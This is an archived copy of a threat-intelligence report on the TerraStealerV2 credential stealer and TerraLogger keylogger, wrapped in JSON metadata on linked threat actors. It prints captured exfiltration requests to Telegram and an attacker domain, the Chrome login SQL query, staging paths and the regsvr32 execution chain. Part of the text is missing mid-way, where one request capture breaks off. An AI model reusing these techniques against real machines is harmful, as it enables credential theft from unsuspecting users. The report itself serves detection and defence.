{
	"id": "a44bbc02-9cc7-4aa5-bc3d-7117f273dda7",
	"created_at": "2026-04-06T00:21:04.068502Z",
	"updated_at": "2026-04-10T03:36:08.256779Z",
	"deleted_at": null,
	"sha1_hash": "9cf88beab4e819800a7589f3ee60244aad4c88b6",
	"title": "Golden Chickens Unveils TerraStealerV2 and TerraLogger: New Credential Theft Tools Identified by Insikt Group",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 915702,
	"plain_text": "Golden Chickens Unveils TerraStealerV2 and TerraLogger: New\r\nCredential Theft Tools Identified by Insikt Group\r\nBy Insikt Group®\r\nArchived: 2026-04-05 18:10:22 UTC\r\nExecutive Summary\r\nInsikt Group identified two new malware families — TerraStealerV2 and TerraLogger — linked to the financially motivated\r\nthreat actor Golden Chickens (also known as Venom Spider). Golden Chickens is known for operating a Malware-as-a-Service (MaaS) platform used by cybercriminal groups such as FIN6, Cobalt Group, and Evilnum. The new families,\r\nobserved between January and April 2025, suggest ongoing development aimed at credential theft and keylogging.\r\nTerraStealerV2 is designed to collect browser credentials, cryptocurrency wallet data, and browser extension information.\r\nWhile it targets the Chrome “Login Data” database to steal credentials, it does not bypass Application Bound Encryption\r\n(ABE) protections introduced in Chrome updates after July 2024, indicating the malware code is outdated or still under\r\ndevelopment. Data is exfiltrated to both Telegram and the domain wetransfers[.]io. The stealer has been observed being\r\ndistributed via multiple formats, including LNK, MSI, DLL, and EXE files, and leverages trusted Windows utilities, such as\r\nregsvr32.exe and mshta.exe, to evade detection.\r\nTerraLogger, by contrast, is a standalone keylogger. It uses a common low-level keyboard hook to record keystrokes and\r\nwrites the logs to local files. However, it does not include functionality for data exfiltration or command-and-control (C2)\r\ncommunication, indicating it is either in early development or intended to be a modular part of the Golden Chickens MaaS\r\necosystem.\r\nThe current state of TerraStealerV2 and TerraLogger suggests that both tools remain under active development and do not\r\nyet exhibit the level of stealth typically associated with mature Golden Chickens tooling. 
Given Golden Chickens’ history of\r\ndeveloping malware for credential theft and access operations, these capabilities will likely continue to evolve.\r\nOrganizations are advised to follow the mitigation guidance provided in this report to reduce the risk of compromise as these\r\nmalware families mature.\r\nKey Findings\r\nInsikt Group identified two new malware families, TerraStealerV2 and TerraLogger, attributed to the threat actor\r\nGolden Chickens. TerraStealerV2 can steal browser credentials and target cryptocurrency wallets, while TerraLogger\r\nfunctions solely as a standalone keylogger module.\r\nTerraLogger is the first observed use of a keylogging capability within malware developed by Golden Chickens.\r\nTerraStealerV2 lacks support for decrypting Chrome ABE-protected credentials, indicating the tool is likely outdated\r\nor still under development.\r\nInsikt Group observed ten distinct TerraStealerV2 distribution samples between January and March 2025 that\r\nemployed varied delivery methods, including MSI, DLL, and LNK files.\r\nBackground\r\nGolden Chickens, also tracked under the alias Venom Spider, is a financially motivated cyber threat actor known for\r\noperating a stealthy and modular malware suite under a MaaS model. Since at least 2018, the Golden Chickens MaaS suite\r\nhas been deployed in campaigns targeting high-value organizations through social engineering vectors, particularly\r\nspearphishing campaigns leveraging fake job offers or resumes. Notably, the malware is used by top-tier cybercrime groups,\r\nincluding Russia-based FIN6 and Cobalt Group, as well as the Belarus-based Evilnum, which has been linked to damages of\r\nover $1.5 billion USD globally.\r\nThe core components of the Golden Chickens MaaS suite are VenomLNK and TerraLoader. 
Initial infections are typically\r\nachieved through VenomLNK, a malicious Windows shortcut file, which executes TerraLoader, a loader module responsible\r\nfor deploying additional Golden Chickens malware. These modules include TerraStealer for credential harvesting, TerraTV\r\nfor TeamViewer hijacking, and TerraCrypt for ransomware deployment. Additional malware families attributed to the\r\nGolden Chickens ecosystem include TerraRecon for reconnaissance, TerraWiper for data wiping, and lite_more_eggs, as\r\ndepicted in Figure 1 below.\r\nhttps://www.recordedfuture.com/research/terrastealerv2-and-terralogger\r\nPage 1 of 7\n\nFigure 1: Previously reported Golden Chickens malware families (Source: Quo Intelligence)\r\nAttribution efforts by eSentire’s Threat Response Unit have linked Golden Chickens to a threat actor known as\r\nbadbullzvenom, a persona that is believed to be operated jointly by individuals from Moldova and Montreal, Canada. The\r\nthreat actor’s development history demonstrates progress from a low-level forum participant to an established MaaS\r\nprovider. Tools developed by Golden Chickens have been weaponized in several campaigns, including high-profile attacks\r\non British Airways, Newegg, and Ticketmaster UK.\r\nBetween August and October 2024, Zscaler ThreatLabz observed renewed activity attributed to Golden Chickens involving\r\nthe deployment of two newly identified malware families: RevC2 and Venom Loader. These tools were delivered via\r\nVenomLNK campaigns, leveraging social engineering lures like cryptocurrency payment requests and software API\r\ndocumentation. Figure 2 illustrates the attack chain used to deliver RevC2.\r\nFigure 2: Recent Golden Chickens attack chain used to deliver RevC2 (Source: Zscaler)\r\nWhile the initial delivery vector is not known, the infection sequence begins with the execution of a VenomLNK file. 
This\r\nfile downloads a decoy image consistent with the lure theme (in this case, software API documentation) and initiates RevC2\r\nexecution. Specifically, the LNK file leverages wmic.exe to invoke regsvr32.exe, which loads a malicious OCX payload\r\nhosted on a remote network share.\r\nTechnical Analysis\r\nInsikt Group identified two new malware families attributed to the threat actor group Golden Chickens. The first, tracked as\r\nTerraStealerV2, is a stealer primarily targeting browser credentials, cryptocurrency wallets, and browser extensions. The\r\nsecond, tracked as TerraLogger, is a keylogger observed as a standalone module. The following subsections provide a\r\ndetailed technical analysis of each malware family.\r\nTerraStealerV2\r\nInsikt Group recently identified a new stealer attributed to Golden Chickens, uploaded to Recorded Future Malware\r\nIntelligence on March 3, 2025. A Program Database (PDB) path embedded in the sample (see Figure 3) suggests the threat\r\nactor refers to the malware as NOK; however, Insikt Group tracks it as TerraStealerV2.\r\nC:\\Users\\Admin\\source\\repos\\NOK\\NOK\\x64\\Release\\NOK.pdb\r\nFigure 3: TerraStealerV2 PDB string (Source: Recorded Future)\r\nThe stealer is intended to be delivered as an OCX file and executed via regsvr32.exe, which invokes the DllRegisterServer\nexport function. Upon execution, DllRegisterServer first checks that the provided file has a .ocx extension and that the\nfilename ends with a specific hard-coded character or digit (for example, 0.ocx). It then verifies that the file is being run by\nregsvr32.exe before proceeding, as illustrated in Figure 4 below.\nFigure 4: Flow chart illustrating TerraStealerV2’s anti-analysis checks (Source: Recorded Future)\nThe malware then performs string deobfuscation using an XOR decoding routine with a hard-coded key. 
It collects basic\nhost information by invoking GetUserNameA and GetComputerNameA to retrieve the local user and system names. It then\ndetermines the victim’s IP address by making an HTTP request to ifconfig[.]me. The collected data is subsequently\nexfiltrated via the Telegram messaging platform to a channel named “Noterdam” using a bot token associated with\n“NoterdanssBot,” as shown in Figure 5.\nPOST /\u003c redacted \u003e/sendMessage?chat_id=-4652754121 HTTP/1.1\nHost: api.telegram.org\nAccept: */*\nContent-Length: 24014\nContent-Type: application/x-www-form-urlencoded\nchat_id=-4652754121\u0026text=%2A%2ANew%20User%20Ran%20the%20Application%2A%2A%0A%2A%2AUsername%3A%2A%2A%20Admin%0A%2A%2APC%20Name%3A%2A%2A%20UUHJKMQK%0A%\nFigure 5: TerraStealerV2 exfiltrating initial data to Telegram (Source: Recorded Future)\nURL decoding the message's POST data reveals that the threat actor sends a structured notification to a Telegram channel.\nThe notification, shown in Figure 6, includes an alert indicating a new user ran the application, the collected username and\nsystem name, and the raw HTML response from the ifconfig[.]me request.\n**New User Ran the Application**\n**Username:** Admin\n**PC Name:** UUHJKMQK\n**IP Address:**\n\n---\nmeta-description: Get my IP Address\nmeta-keywords: ip address ifconfig ifconfig.me\n---\nFigure 6: URL-decoded data exfiltrated to Telegram (Source: Recorded Future)\nThe malware then enumerates active processes, searching for instances of chrome.exe; if detected, it attempts to terminate\nthe process using the TerminateProcess Windows API. This behavior is likely intended to release any file locks on Chrome’s\nbrowser database files, ensuring unobstructed access during data extraction. 
Following this, the malware attempts to extract\nstored credentials and other sensitive data from Chrome and targets specific cryptocurrency wallets and browser extensions.\nThe Chrome browser database theft implementation copies the \"Login Data\" database to C:\\ProgramData\\Temp\\LoginData\nand then extracts saved logins using a statically linked SQLite library to execute the SQL query SELECT origin_url,\nusername_value, password_value FROM logins. TerraStealerV2 uses SQLite version 3.46.0, which is the same version\nstatically linked in RevC2, suggesting possible code reuse or shared development practices. However, the implementation\ndoes not bypass Chrome’s ABE, meaning collected passwords will not be decrypted for any hosts with Chrome-based\nbrowsers updated since July 24, 2024. This limitation suggests that the stealer code is outdated or still under active\ndevelopment, as effective stealers typically incorporate ABE bypass techniques to extract decrypted credentials from modern\nversions of Chrome or Microsoft Edge.\nExfiltrated browser login data and informational messages are written to C:\\ProgramData\\file.txt and copied to\n%LOCALAPPDATA%\\Packages\\Bay0NsQIzx\\p.txt when stealing operations have completed. If found, targeted browser\nextensions and wallets have their directories copied to %LOCALAPPDATA%\\Packages\\Bay0NsQIzx, and a Telegram\nmessage is sent indicating the number of crypto wallets found. The contents of\n%LOCALAPPDATA%\\Packages\\Bay0NsQIzx are subsequently compressed into an archive named output.zip, located in\nthe same directory. The archive is then exfiltrated to the Telegram bot and a secondary C2 endpoint hosted at\nwetransfers[.]io/uplo.php, as shown in Figure 7. 
The domain wetransfers[.]io was registered on February 18, 2025, via\nNameCheap, Inc., and is currently hosted behind Cloudflare infrastructure.\nPOST /uplo.php HTTP/1.1\nHost: wetransfers.io\nAccept: */*\nContent-Length: 11252\nContent-Type: multipart/form-data; boundary=------------------------rUxSmqCNbtGx4auL8M41nl\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"zipFile\"; filename=\"output.zip\"\nContent-Type: application/octet-stream\nPK........3.dZ...')...).......p.txt2025-03-04 21:33:38 - Total Browsers 2\nPK..?.......3.dZ...')...).....................p.txtPK..........3...L.....\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"pcname\"\nUUHJKMQK\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"username\"\nAdmin\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"totalwallets\"\n0\n--------------------------rUxSmqCNbtGx4auL8M41nl\nContent-Disposition: form-data; name=\"ip\"\n\nresource hosted on the same domain leveraged for data exfiltration — using either curl or PowerShell, and subsequently\r\nexecuted via regsvr32.exe (see Figure 8).\r\nFigure 8: TerraStealerV2 distribution samples attack chain (Source: Recorded Future)\r\nTable 1 lists distribution samples, including their filenames, compilation timestamps, and the corresponding TerraStealerV2\r\npayloads Golden Chickens have been observed deploying. One LNK file (SHA-256:\r\n9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a) appears to overlap with the activity cluster\r\ntracked as ClickFix. 
In this case, the LNK file dropped a payload masquerading as an MP4 file, which was executed via\r\nmshta.exe — a technique consistent with previously observed tactics in ClickFix campaigns.\r\nTerraStealerV2 Distribution (SHA-256) | Filename | Compilation/First Submitted Timestamp | TerraStealerV2 Loaded\r\n9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a | olala.lnk | 2025-01-03 03:32 UTC | 828eee78537e49b46e34a\r\n58b324d37bbf6d706b0fe5dbb8bca92d9628a9c394ca81121cea1690a16a3afa | 1.exe | 2025-01-29 05:41:34 UTC | 151a83f0b54d23d84fb15\r\n63fb3ed0aba87917847ad256c4e89f7b250adc6e2eac74023bb52e091ab0ef97 | BundleInstaller.dll | 2025-02-18 22:20:54 UTC | 151a83f0b54d23d84fb15\r\n4b6fa036aceb1e2149848ff46c4e1a6a89eee3b7d59769634ce9127fdaa96234 | setup.msi | 2025-02-19 12:44:27 UTC | 151a83f0b54d23d84fb15\r\n14d9d56bc4c17a971a9d69b41a4663ab7eb2ca5b52d860f9613823101f072c31 | setup.msi | 2025-02-19 13:22:37 UTC | d6246e4f0425b38a26298\r\n1ed9368d5ac629fa2e7e81516e4520f02eb970d010d3087e902cd4f2e35b1752 | setup.msi | 2025-02-19 19:26:03 UTC | 151a83f0b54d23d84fb15\r\n766690a09ec97e414e732d16b99b19389a91835abc15684cc0f1aba2ca93cf98 | hyhyhy.lnk | 2025-02-28 07:40 UTC | 828eee78537e49b46e34a\r\n313203cb71acd29e6cc542bf57f0e90ce9e9456e2483a20418c8f17b7afe0b57 | 1.exe | 2025-03-03 13:51:40 UTC | a2f7d83ddbe0aeba5f5113\r\nde6ed44d21e5bc9bc5c1c51f33760a5d96378308d02c2c81ef2d75e7a201fb63 | 1.exe | 2025-03-03 13:51:40 UTC | a2f7d83ddbe0aeba5f5113\r\nTable 1: Samples used to distribute TerraStealerV2 (Source: Recorded Future)\r\nTerraLogger\r\nInsikt Group identified a new keylogger associated with Golden Chickens, which was uploaded to Recorded Future\r\nMalware Intelligence on January 13, 2025. Insikt Group tracks this family as TerraLogger and has identified five distinct\r\nsamples. Four samples operate as intended and contain an identical PDB string, shown in Figure 9 below. 
The remaining\r\nsample does not include this PDB string and instead uses the same PDB path as TerraStealerV2 (see Figure 3 above). This\r\noutlier appears to be a developer test, using the same string-encoding method as TerraStealerV2; however, it fails during\r\nexecution due to a crash while initializing keylogger-related strings, which prevents the malware from reaching its primary\r\nentry point.\r\nC:\\Users\\PC\\Downloads\\Projector\\Projector\\x64\\Release\\Projector.pdb\r\nFigure 9: TerraLogger PDB string (Source: Recorded Future)\r\nTerraLogger is typically delivered as an OCX file and employs the same initial execution checks as TerraStealerV2. It is\r\nintended to be executed via regsvr32.exe, which invokes the DllRegisterServer export function. Upon execution, it first\r\nchecks that the provided file has a .ocx extension and that the filename ends with a hard-coded character or digit (such as\r\n0.ocx). It then verifies that it is being run by regsvr32.exe before proceeding. If the initial execution checks pass,\r\nTerraLogger opens a file handle to log keystrokes.\r\nInsikt Group identified multiple file paths across the five identified samples, with logs written to files such as a.txt, f.txt,\r\nop.txt, or save.txt located in the C:\\ProgramData folder. The malware implements its keylogger using a commonly observed\r\ntechnique by installing a WH_KEYBOARD_LL hook using SetWindowsHookExA, registering the fn callback function\r\n(shown in Figure 10) to intercept and process message events, enabling keyboard activity to be captured.\r\nFigure 10: Keylogger callback function (Source: Recorded Future)\r\nKeystrokes are written to the open log file within the mw_log_key function. This function first retrieves the title of the\r\ncurrent foreground window, then appends a line separator followed by the intercepted keystrokes. 
It contains logic to handle\r\nspecial characters, such as semicolons, brackets, and quotes, and checks the state of the Shift key to determine the correct\r\ncharacter to log. If a keycode does not match any known special keys, it is written in \u003cKEY-[keycode]\u003e format. An example\r\nof a resulting log file is shown in Figure 11.\r\nFigure 11: Keylogger log file example (Source: Recorded Future)\r\nTable 2 lists the five TerraLogger keylogger samples identified and summarizes the differences across versions. Compilation\r\ntimestamps indicate that the first version was built on January 13, 2025, and that the most recent sample was compiled on\r\nApril 1, 2025. These samples reflect minor, incremental updates, suggesting active development. Notable changes include\r\nmodifications to the file path used for storing keystroke logs and a shift in how special keys are represented — from angle-bracketed, uppercase tokens to pipe-delimited, lowercase abbreviations (for example, |bck|, |sft|).\r\nSample | Compile Time | Save Path | Special Keys Capitalized / Abbreviated\r\n067421234fdd631628569bd86b6757ce4c78139c3609493c92db7b096b0c22f4 | 2025-01-13 14:16:35 UTC | c:\\programdata\\save.txt | ✔\r\n315e0c9f0dbfa662327c57a570bcafc79b1ba816deb9647fd8da5dc6dc1e8808 | 2025-02-06 09:00:22 UTC | c:\\programdata\\save.txt | ✔\r\nf06097b6f4bf86ad00c8f7115d538823a73e531b0f06b66f63f9c70e47f4ea98 | 2025-03-11 14:39:27 UTC | c:\\programdata\\op.txt | ✔\r\n852879a9832cd13cbc9510503abf9b0906bb5e08e5ffae74381aaca3c502d826 | 2025-03-11 14:42:11 UTC | c:\\programdata\\a.txt | ✔\r\n81117772d2b1997f4e280c3add3b56c128444ba05ec4eaaf2293ef8ff1c76257 | 2025-04-01 15:54:57 UTC | c:\\programdata\\f.txt | ✔\r\nTable 2: Comparison of standalone TerraLogger sample changes (Source: Recorded Future)\r\nSource: https://www.recordedfuture.com/research/terrastealerv2-and-terralogger",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.recordedfuture.com/research/terrastealerv2-and-terralogger"
	],
	"report_names": [
		"terrastealerv2-and-terralogger"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f5c90ccc-0f18-4e07-a246-b62101ab2f6f",
			"created_at": "2023-01-06T13:46:38.854407Z",
			"updated_at": "2026-04-10T02:00:03.122844Z",
			"deleted_at": null,
			"main_name": "GC02",
			"aliases": [
				"Golden Chickens",
				"Golden Chickens02",
				"Golden Chickens 02"
			],
			"source_name": "MISPGALAXY:GC02",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f2fa9952-301f-4376-ac69-743d6f2bec1e",
			"created_at": "2023-01-06T13:46:39.122721Z",
			"updated_at": "2026-04-10T02:00:03.22231Z",
			"deleted_at": null,
			"main_name": "VENOM SPIDER",
			"aliases": [
				"badbullz",
				"badbullzvenom"
			],
			"source_name": "MISPGALAXY:VENOM SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88802a4b-5b3d-42ee-99e6-8a4f5fd231f6",
			"created_at": "2023-01-06T13:46:38.851345Z",
			"updated_at": "2026-04-10T02:00:03.121861Z",
			"deleted_at": null,
			"main_name": "GC01",
			"aliases": [
				"Golden Chickens",
				"Golden Chickens01",
				"Golden Chickens 01"
			],
			"source_name": "MISPGALAXY:GC01",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7a257844-df90-4bd4-b0f1-77d00ff82802",
			"created_at": "2022-10-25T16:07:24.376356Z",
			"updated_at": "2026-04-10T02:00:04.964565Z",
			"deleted_at": null,
			"main_name": "Venom Spider",
			"aliases": [
				"Golden Chickens",
				"TA4557",
				"Venom Spider"
			],
			"source_name": "ETDA:Venom Spider",
			"tools": [
				"More_eggs",
				"PureLocker",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Taurus Loader Reconnaissance Module",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraCrypt",
				"TerraLogger",
				"TerraPreter",
				"TerraRecon",
				"TerraStealer",
				"TerraTV",
				"TerraWiper",
				"ThreatKit",
				"VenomKit",
				"VenomLNK",
				"lite_more_eggs"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434864,
	"ts_updated_at": 1775792168,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9cf88beab4e819800a7589f3ee60244aad4c88b6.pdf",
		"text": "https://archive.orkl.eu/9cf88beab4e819800a7589f3ee60244aad4c88b6.txt",
		"img": "https://archive.orkl.eu/9cf88beab4e819800a7589f3ee60244aad4c88b6.jpg"
	}
}